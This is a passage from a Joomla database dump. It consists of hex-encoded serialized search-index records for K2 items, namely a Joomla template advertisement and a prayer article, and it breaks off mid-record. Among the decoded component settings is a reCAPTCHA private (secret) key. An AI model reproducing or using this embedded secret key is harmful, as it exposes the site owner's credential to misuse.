0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a313a2233223b733a353a22616c696173223b733a33303a226162616e612d6a6f6f6d6c612d74656d706c6174652d72656c6561736564223b733a373a2273756d6d617279223b733a3834393a223c703e3c6120646174612d6c69676874626f783d2267726f75703a67616c6c657279312220687265663d22696d616765732f64656d6f2f626c6f672f626c6f675f6269675f312e6a706722207469746c653d224c6f72656d20697073756d20646f6c6f722073697420616d65742c20636f6e73656374657475722061646970697363696e6720656c69742e20446f6e65632073697420616d6574206e6962682e20566976616d7573206e6f6e20617263752e204c6f72656d20697073756d20646f6c6f722073697420616d65742c20636f6e73656374657475722061646970697363696e6720656c69742e2220646174612d73706f746c696768743d226f6e223e3c696d6720636c6173733d22706963336422207372633d22696d616765732f64656d6f2f626c6f672f626c6f675f66756c6c5f696d675f312e6a70672220626f726465723d22302220616c743d2222202f3e3c2f613e3c2f703e0d0a3c703e3c6120687265663d22687474703a2f2f7468656d65666f726573742e6e65742f6974656d2f6c69676874686f7573652d726573706f6e736976652d6a6f6f6d6c612d74656d706c6174652f333236363130313f7265663d6172726f777468656d657322207461726765743d225f626c616e6b223e4162616e61204a6f6f6d6c612054656d706c6174653c2f613e6973206120636c65616e20616e64206c696768742064657369676e207573696e67206120626c656e64206f66206272696768742d636f6c6f727320616e64206d6f7573652d7069636b65642074657874757265732c207768696368206d616b6573206974207375697461626c6520666f7220616c6c206b696e6473206f6620776562736974657320657370656369616c6c7920666f7220652d636f6d6d657263652c20627573696e657373206f7220636f72706f7261746520736974652e204265756c616820696e636c7564657320612076617269657479206f66207072657365747320666f7220636f6c6f72732c206261636b67726f756e64732c20746578747572657320616e6420666f6e74732c206d616b696e67206974206561737920666f7220796f7520746f20637573746f6d697a6520746865206f766572616c6c207374796c6520746f2066697420796f7572206e656564732e3c2f703e0d0a3c6469763e223b733a343a22626f6479223b733a313630363a220d0a3c703e546865206665617475726573206174206120676c616e6365206172653a3c6272202f3e3c6272202f3e3c2f703e0d0a3c756c20636c6173733d227374796c652062756c6c65742d31223e0d0a3c6c693e4275696c74207573696e672048544d4c35202f435353333c2f6c693e0d0a3c6c693e313020756e6971756520436f6c6f72205374796c65733c2f6c693e0d0a3c6c693e4f7665722036302048544d4c20506167657320696e636c756465643c2f6c693e0d0a3c6c693e3620536c696465727320696e636c756465643c2f6c693e0d0a3c6c693e57656c6c20446f63756d656e7465643c2f6c693e0d0a3c6c693e456e68616e636564206a717565727920696e746567726174696f6e3c2f6c693e0d0a3c6c693e43726f73732062726f7773657220636f6d70617469626c6520284945372c20494538202c204945392c2046697265666f7820332e3620746f20382c204368726f6d652c204f706572612c20536166617269293c2f6c693e0d0a3c6c693e576f726b696e6720636f6e7461637420666f726d20776974682076616c69646174696f6e20616e6420616a617820726573756c747320776974686f75742072656c6f6164696e6720706167653c2f6c693e0d0a3c6c693e46696c74657261626c6520506f7274666f6c696f3c2f6c693e0d0a3c6c693e53696465626172204e617669676174696f6e204d656e753c2f6c693e0d0a3c6c693e576f726b696e67206e6577736c657474657220737562736372697074696f6e2077696467657420776974686f7574207061676520726566726573683c2f6c693e0d0a3c6c693e416476616e636564204d756c74692d6c6576656c2064726f70646f776e206d656e75733c2f6c693e0d0a3c6c693e4353533320627574746f6e7320286e6f20696d616765732075736564293c2f6c693e0d0a3c6c693e43535333207461677320776974682066616c6c6261636b206f6e206f6c6465722062726f77736572733c2f6c693e0d0a3c6c693e496e6275696c74206a717565727920736c69646572207769746820766964656f20737570706f72743c2f6c693e0d0a3c6c693e5374796c656420626c6f6720706167696e6174696f6e3c2f6c693e0d0a3c6c693e4d756c7469706c652050616765206c61796f757420636f6d62696e6174696f6e733c2f6c693e0d0a3c6c693e4d756c7469706c652057696467657420566172696174696f6e733c2f6c693e0d0a3c6c693e54657374696d6f6e69616c73207769646765743c2f6c693e0d0a3c6c693e54776974746572207769646765743c2f6c693e0d0a3c6c693e4a717565727920746f6f6c746970733c2f6c693e0d0a3c6c693e456c6567616e742070726963696e67207461626c6573207769746820757020746f2073697820636f6c756d6e732e20476574206d6f7265207374796c657320686572653c2f6c693e0d0a3c6c693e436c65616e2c20636f6d6d656e74656420636f6465207769746820696e64656e74733c2f6c693e0d0a3c6c693e466f726d20456c656d656e747320637573746f6d2055493c2f6c693e0d0a3c6c693e4353533320466f6e742066616365206f7220676f6f676c6520666f6e7473206f7074696f6e3c2f6c693e0d0a3c6c693e476f6f676c65204d617020696e746567726174696f6e20776974682064796e616d6963206c6f636174696f6e20706f696e7465723c2f6c693e0d0a3c6c693e476f6f676c652043686172747320e280932053746174696320616e6420496e7465726163746976653c2f6c693e0d0a3c6c693e536f6c6964207479706f6772617068792077697468206c697374732c20636f6e74656e7420626f7865732c207461626c65732c20626c6f636b71756f7465732c20636f646520626c6f636b732c20627574746f6e732c2064726f706361707320616e64206d756368206d6f72653c2f6c693e0d0a3c6c693e426c6f636b205469746c6520636f6c6f72207370616e733c2f6c693e0d0a3c6c693e343034204572726f72207061676520696e636c756465643c2f6c693e0d0a3c6c693e3130205072657365742070616765733c2f6c693e0d0a3c6c693e44656d6f206461746120696e636c756465643c2f6c693e0d0a3c6c693e53454f20667269656e646c793c2f6c693e0d0a3c6c693e416e64206d7563682c206d756368206d6f72653c2f6c693e0d0a3c2f756c3e0d0a3c2f6469763e223b733a353a226361746964223b733a313a2234223b733a31303a22637265617465645f6279223b733a323a223432223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31313a226d6f6469666965645f6279223b733a323a223432223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a227264617465223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2230223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2232223b733a353a227472617368223b733a313a2231223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a383a2246696e616e636573223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33323a22333a6162616e612d6a6f6f6d6c612d74656d706c6174652d72656c6561736564223b733a373a22636174736c7567223b733a31303a22343a66696e616e636573223b733a363a22617574686f72223b4e3b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35303a22636f6d706f6e656e742f6b322f6974656d2f332d6162616e612d6a6f6f6d6c612d74656d706c6174652d72656c6561736564223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a343a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a383a2246696e616e636573223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a383a2246696e616e636573223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33383a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d33223b733a353a22726f757465223b733a36393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d333a6162616e612d6a6f6f6d6c612d74656d706c6174652d72656c6561736564223b733a353a227469746c65223b733a33383a22436f7079206f66204162616e61204a6f6f6d6c612054656d706c6174652052656c6561736564223b733a31313a226465736372697074696f6e223b733a3336393a22204162616e61204a6f6f6d6c612054656d706c617465206973206120636c65616e20616e64206c696768742064657369676e207573696e67206120626c656e64206f66206272696768742d636f6c6f727320616e64206d6f7573652d7069636b65642074657874757265732c207768696368206d616b6573206974207375697461626c6520666f7220616c6c206b696e6473206f6620776562736974657320657370656369616c6c7920666f7220652d636f6d6d657263652c20627573696e657373206f7220636f72706f7261746520736974652e204265756c616820696e636c7564657320612076617269657479206f66207072657365747320666f7220636f6c6f72732c206261636b67726f756e64732c20746578747572657320616e6420666f6e74732c206d616b696e67206974206561737920666f7220796f7520746f20637573746f6d697a6520746865206f766572616c6c207374796c6520746f2066697420796f7572206e656564732e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a303b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031332d30312d30332032313a31313a3330223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031332d30312d30352030383a31313a3232223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(168, 'index.php?option=com_k2&view=item&id=34', 'index.php?option=com_k2&view=item&id=34:prayer', 'Scriptural Prayers for your Husband', ' TEXT: Psalm 128:1-end, 1 Samuel 30, Isaiah 65 Introduction: Stop complaining about your husband, stop quarreling with him, stop getting bitter at him, stop competing against him, stop comparing yourself with him, stop rating him on his weakness and failu', '2017-03-23 16:26:05', '0205fce3451c50a75dc76fffe95b2d78', 1, 1, 1, '*', '2017-03-23 16:06:55', '0000-00-00 00:00:00', '2017-03-23 16:06:55', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223334223b733a353a22616c696173223b733a363a22707261796572223b733a373a2273756d6d617279223b733a3430313a223c703e544558543a205073616c6d203132383a312d656e642c20312053616d75656c2033302c204973616961682036353c2f703e0d0a3c703e496e74726f64756374696f6e3a2053746f7020636f6d706c61696e696e672061626f757420796f75722068757362616e642c2073746f70207175617272656c696e6720776974682068696d2c2073746f702067657474696e67206269747465722061742068696d2c2073746f7020636f6d706574696e6720616761696e73742068696d2c2073746f7020636f6d706172696e6720796f757273656c6620776974682068696d2c2073746f7020726174696e672068696d206f6e20686973207765616b6e65737320616e64206661696c7572652c2073746f7020636f6d706172696e672068696d2077697468206f746865727320746861742068617665207375636365737320746861742063616e206265207365656e2c2073746f7020616c6c206d616c6963652c206269636b6572696e6720616e642072616e636f75722c2053544f502c2053544f502c2053544f5021c2a03c2f703e0d0a223b733a343a22626f6479223b733a323633363a220d0a3c703e576861742061726520796f7520746f20646f3f20505241592c20505241592c205052415921212120596f757220707261796572732063616e206d616b6520616c6c2074686520646966666572656e63652c20796f757220707261796572206f66206